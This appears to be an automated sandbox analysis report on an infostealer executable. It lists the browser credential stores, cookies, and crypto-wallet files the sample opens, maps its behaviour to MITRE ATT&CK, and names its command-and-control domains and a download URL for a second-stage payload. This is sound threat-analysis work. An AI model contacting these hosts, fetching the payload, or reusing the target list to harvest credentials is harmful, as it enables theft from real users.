                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match | File source: Process Memory Space: FBmz85HS0d.exe PID: 7312, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                Source: FBmz85HS0d.exe | String found in binary or memory: Wallets/Electrum
                Source: FBmz85HS0d.exe | String found in binary or memory: Wallets/ElectronCash
                Source: FBmz85HS0d.exe | String found in binary or memory: window-state.json
                Source: FBmz85HS0d.exe | String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: FBmz85HS0d.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: FBmz85HS0d.exe | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: FBmz85HS0d.exe | String found in binary or memory: %appdata%\Ethereum
                Source: FBmz85HS0d.exe | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: FBmz85HS0d.exe, 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.json
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: C:\Users\user\Documents\HMPPSXQPQV
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: C:\Users\user\Documents\HQJBRDYKDE
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: C:\Users\user\Documents\LHEPQPGEWF
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: C:\Users\user\Documents\ZIPXYXWIOY
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: C:\Users\user\Documents\NWCXBPIUYI
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: C:\Users\user\Documents\LIJDSFKJZG
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Directory queried: number of queries: 1001
                Source: Yara match | File source: 00000000.00000003.1400999806.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1378457678.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1401787404.0000000001225000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1378025809.0000000001224000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: FBmz85HS0d.exe PID: 7312, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match | File source: Process Memory Space: FBmz85HS0d.exe PID: 7312, type: MEMORYSTR
                Source: Yara match | File source: sslproxydump.pcap, type: PCAP
                Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
                MITRE ATT&CK Matrix (one line per tactic; a number before a technique is the match count shown in the report)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: 2 Windows Management Instrumentation; 1 PowerShell; At; Cron; Launchd; Scheduled Task
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: 2 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: 34 Virtualization/Sandbox Evasion; 2 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
                Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: 1 Query Registry; 751 Security Software Discovery; 34 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 File and Directory Discovery; 223 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: 1 Archive Collected Data; 41 Data from Local System; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
                Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

                Antivirus Detection

                Source | Detection | Scanner | Label
                FBmz85HS0d.exe | 61% | ReversingLabs | Win32.Infostealer.Tinba
                FBmz85HS0d.exe | 100% | Avira | TR/Crypt.TPM.Gen
                FBmz85HS0d.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                s3-w.us-east-1.amazonaws.com | 3.5.25.82 | true | false | | high
                bitbucket.org | 185.166.143.50 | true | false | | high
                cuddlyready.xyz | 172.67.150.173 | true | false | | high
                bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
                Domains and URLs from Memory

                Name | Malicious | Antivirus Detection | Reputation
                sendypaster.xyz | false | | high
                steppriflej.xyz | false | | high
                smash-boiling.cyou | false | | high
                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe | false | | high
                supporse-comment.cyou | false | | high
                hosue-billowy.cyou | false | | high
                cuddlyready.xyz | false | | high
                ripe-blade.cyou | false | | high
                greywe-snotty.cyou | false | | high
                https://cuddlyready.xyz/api | false | | high
                pollution-raker.cyou | false | | high
                                                                                                                              high
                                                                                                                              https://ac.ecosia.org/autocomplete?q=FBmz85HS0d.exe, 00000000.00000003.1328496994.000000000593B000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328246456.000000000593E000.00000004.00000800.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1328645582.000000000593B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://cuddlyready.xyz/apiiceFBmz85HS0d.exe, 00000000.00000003.1427375694.0000000001277000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://cuddlyready.xyz:443/apiFBmz85HS0d.exe, 00000000.00000003.1446443931.0000000001273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
